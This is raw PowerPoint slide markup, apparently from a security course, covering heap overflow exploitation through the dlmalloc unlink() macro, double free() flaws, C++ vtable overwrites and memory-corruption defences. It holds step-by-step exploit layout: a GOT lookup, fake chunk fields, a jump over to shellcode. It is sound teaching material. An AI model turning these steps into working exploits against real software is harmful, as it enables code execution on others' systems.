          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2171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6470" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2400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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086471" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2628900"/>
            <a:ext cx="2362200" cy="6858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6472" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3314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6473" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3543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PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086474" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2571751"/>
            <a:ext cx="745066"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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086475" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648201" y="3714751"/>
            <a:ext cx="788873"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086476" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2171700"/>
            <a:ext cx="76200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16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6477" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3371850"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11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6478" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37719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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086479" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086480" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42291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of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086481" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4457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PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086482" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4686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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086483" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="49149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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086484" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4286250"/>
            <a:ext cx="76200" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11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6485" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="4514851"/>
            <a:ext cx="742962"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Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336224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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GOT entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -R ./test | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> free</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>08049924 R_386_JUMP_SLOT   free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x08049924 - 0x0c = 0x8049918</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First 8 bytes of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the data portion of X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will be overwritten by unlink() with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following two bytes are jump forward of 12 bytes (0xeb 0x0c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following 12 bytes are modified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="ヒラギノ角ゴ Pro W3" charset="-128"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then fake chunk with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x8049918 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = X + 8 (address of the jump instruction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second fake chunk with PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19209991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8930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Double free() Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If a programmer makes the mistake of freeing a pointer that was already freed, in some cases it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A memory block X is allocated (size = N)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>free(X) is invoked and consolidated with an adjacent block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A new block Y is allocated in the consolidated space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tries to use recently freed memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Y is filled with attacker-provided data, which creates a fake block starting at address X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>free(X) is called again and the unlink() macro is called because of the consolidation and memory is overwritten as in the case for the standard heap overflow attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19372205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1346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwriting C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vtables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>C++ objects are allocated on the heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each object is associated with virtual function table pointer (vfptr), which points to the current definition of the object’s methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A variable overflow can be used to overwrite the vfptr so that it points to an area specified by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When a method is invoked the attacker’s code is executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1196422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Corruption Protections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write decent programs! (impossible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a language that performs boundary checking and does not allow pointer arithmetic (e.g., Java or Python)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>analysis of the program before execution (static analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make exploitation harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform checks on the program during execution (dynamic analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call analysis (e.g., sequence analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect “write and execute” action sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity checking (e.g., return address integrity checks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66767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7467600" y="4486336"/>
            <a:ext cx="1447800" cy="117151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7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4375653" y="2213710"/>
            <a:ext cx="2938675" cy="2099438"/>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 name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4822187" y="2571498"/>
            <a:ext cx="2088558" cy="1527208"/>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000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794693" y="4486335"/>
            <a:ext cx="5562491" cy="1062748"/>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5" name="Can 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346953" y="4628035"/>
            <a:ext cx="1039031" cy="858070"/>
          </a:xfrm>
          <a:prstGeom prst="can">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11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2319456" y="2911895"/>
            <a:ext cx="1427357" cy="1062748"/>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12" name="Cloud 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220401" y="4628035"/>
            <a:ext cx="1456001" cy="921048"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5426034" y="4302633"/>
            <a:ext cx="871145" cy="10493"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3022636" y="3462950"/>
            <a:ext cx="2466388" cy="1598057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2466388"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2130743"/>
              <a:gd name="connsiteX1" fmla="*/ 10496 w 2466388"/>
              <a:gd name="connsiteY1" fmla="*/ 2130743 h 2130743"/>
              <a:gd name="connsiteX2" fmla="*/ 1889148 w 2466388"/>
              <a:gd name="connsiteY2" fmla="*/ 2120247 h 2130743"/>
              <a:gd name="connsiteX3" fmla="*/ 2466388 w 2466388"/>
              <a:gd name="connsiteY3" fmla="*/ 461836 h 2130743"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2466388" h="2130743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3499" y="710248"/>
                  <a:pt x="10496" y="2130743"/>
                  <a:pt x="10496" y="2130743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1889148" y="2120247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466388" y="461836"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00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4" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734669" y="3872304"/>
            <a:ext cx="4932774" cy="1346147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4932774"/>
              <a:gd name="connsiteY0" fmla="*/ 1794862 h 1794862"/>
              <a:gd name="connsiteX1" fmla="*/ 4355535 w 4932774"/>
              <a:gd name="connsiteY1" fmla="*/ 1784366 h 1794862"/>
              <a:gd name="connsiteX2" fmla="*/ 4932774 w 4932774"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1794862"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4932774" h="1794862">
                <a:moveTo>
                  <a:pt x="0" y="1794862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4355535" y="1784366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4932774" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00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5" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6066263" y="3880177"/>
            <a:ext cx="1574290" cy="1172959"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1574290 w 1574290"/>
              <a:gd name="connsiteY0" fmla="*/ 1553448 h 1563945"/>
              <a:gd name="connsiteX1" fmla="*/ 713678 w 1574290"/>
              <a:gd name="connsiteY1" fmla="*/ 1563945 h 1563945"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1574290"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1563945"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
